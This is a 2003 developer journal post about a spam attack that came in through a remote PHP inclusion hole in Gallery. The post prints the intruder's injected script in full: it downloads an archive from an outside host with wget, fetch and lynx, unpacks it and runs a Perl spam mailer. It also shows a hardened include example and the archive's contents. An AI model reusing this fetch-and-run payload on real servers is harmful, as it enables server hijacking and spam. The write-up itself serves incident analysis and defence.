
Journal of Purdy (2383)

Friday May 23, 2003
09:15 AM

Hijack through PHP and Hack/Spam through Perl

[ #12402 ]

Thought you guys would find this interesting. I found the source of the spam problem I went through twice: a vulnerability in Gallery (versions prior to 1.3.3). You can read my thread to see the technical details, but here's the gist.

Gallery allowed remote inclusion of another PHP script, which for this spam hack looked like this:

<?echo "<pre>";

passthru("which perl");
passthru("which dig");
echo "uname ";
passthru("uname -a");
echo "\nhostname ";
passthru("hostname");
echo "\n";

echo $HTTP_HOST.$REQUEST_URI;

passthru("kill -9 `cat /tmp/sess_9e4d0713ad1a561e77c93643bafef7a8`");
passthru("rm -rf /tmp/af56j");
passthru("mkdir /tmp/af56j");
passthru("fetch -o- http://4goofs.com/ad13/archive.tgz > /tmp/af56j/archive1.tgz");
passthru("lynx -dump -source http://4goofs.com/ad13/archive.tgz > /tmp/af56j/archive2.tgz");
passthru("wget http://4goofs.com/ad13/archive.tgz -P /tmp/af56j");
passthru("ls -la/tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive1.tgz -C /tmp/af56j");
passthru("tar -zxvf /tmp/af56j/archive2.tgz -C /tmp/af56j");
passthru("rm -rf /tmp/af56j/archive*");
passthru("chmod 700 /tmp/af56j/formail.pl");
passthru("/tmp/af56j/formail.pl");

passthru("rm -f /tmp/af56j/formail.pl");
passthru("ls -la /tmp/af56j");
?>
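For the Perl crowd who don't live in PHP, here is what the inclusion bug behind this looks like in general terms, and what the fix looks like. This is an added example, not Gallery's own code: the variable name $base_dir, the module names and the APP_BASEDIR constant are all hypothetical. The vulnerable pattern is an include() whose path is built from a variable a request can set (register_globals=On, the PHP default before 4.2), so that a query string like ?base_dir=http://.../ makes include() fetch and run a remote script whenever allow_url_fopen is on. The hardened version never lets request data choose the file: it maps a request parameter onto a fixed list of module files, then confirms the resolved path still sits inside the application directory.

```php
<?php
// Added example (not Gallery's code). Shows the remote-inclusion pattern the
// post describes and a hardened replacement. Names here are hypothetical.
//
// VULNERABLE PATTERN: with register_globals=On a request can pre-set $base_dir,
// and with allow_url_fopen=On include() will happily fetch http://... URLs.
//
//   if (!isset($base_dir)) { $base_dir = '.'; }
//   include($base_dir . '/init.php');   // ?base_dir=http://evil.example/ runs remote code
//
// HARDENED: pin the base directory, allowlist the files that may be included,
// and verify the resolved path is still inside the application directory.

define('APP_BASEDIR', dirname(__FILE__));

// Return the absolute path of $relative inside APP_BASEDIR, or false if it
// carries a URL scheme, a ".." segment, does not exist, or resolves elsewhere.
function safe_include_path($relative) {
    // Reject anything that looks like a stream wrapper (http:, ftp:, php:, data:)
    // and any parent-directory traversal.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative) || strpos($relative, '..') !== false) {
        return false;
    }
    $candidate = realpath(APP_BASEDIR . '/' . $relative);
    if ($candidate === false) {
        return false; // file does not exist
    }
    // realpath() follows symlinks, so compare the resolved prefix, not the input.
    $root = realpath(APP_BASEDIR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $root, strlen($root)) !== 0) {
        return false; // resolved outside APP_BASEDIR
    }
    return $candidate;
}

// Only fixed module names from this table ever reach include(); the request
// picks a key, never a path.
$allowed_modules = array(
    'init'   => 'init.php',
    'albums' => 'albums.php',
);

$module = isset($_GET['module']) ? $_GET['module'] : 'init';
if (!isset($allowed_modules[$module])) {
    header('HTTP/1.0 400 Bad Request');
    exit('unknown module');
}

$path = safe_include_path($allowed_modules[$module]);
if ($path === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('module file missing or outside the application directory');
}
include($path);
?>
```

The allowlist alone closes the hole; safe_include_path() is a second layer so that a later edit which starts building paths from strings again still cannot include a URL or escape the directory. Independently of the code, the php.ini settings that matter for this class of bug are register_globals = Off and allow_url_fopen = Off (PHP 4), and on PHP 5.2 or later also allow_url_include = Off, which stops include() from accepting URLs even where allow_url_fopen stays on for file_get_contents().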

Here are the contents of archive2.tgz:


$ tar -tzvf archive2.tgz
-rwxrwxr-x adminsp/games 5044 2003-05-12 05:22 formail.pl
drwxrwxr-x adminsp/games 0 2003-03-02 09:58 lib/
drwxrwxr-x adminsp/games 0 2003-02-01 06:29 lib/Net/
-r--rw-r-- adminsp/games 8762 2003-02-03 05:11 lib/Net/SMTP.pm
-r--rw-r-- adminsp/games 9703 2003-02-03 05:11 lib/Net/Cmd.pm
-r--rw-r-- adminsp/games 3387 2003-02-03 05:11 lib/Net/Config.pm
-rw-r--r-- adminsp/1000 3771 2003-02-03 05:10 lib/ForkManager.pm

Then, here's the formail.pl script (linked rather than pasted, to keep this post shorter).

Peace,

Jason
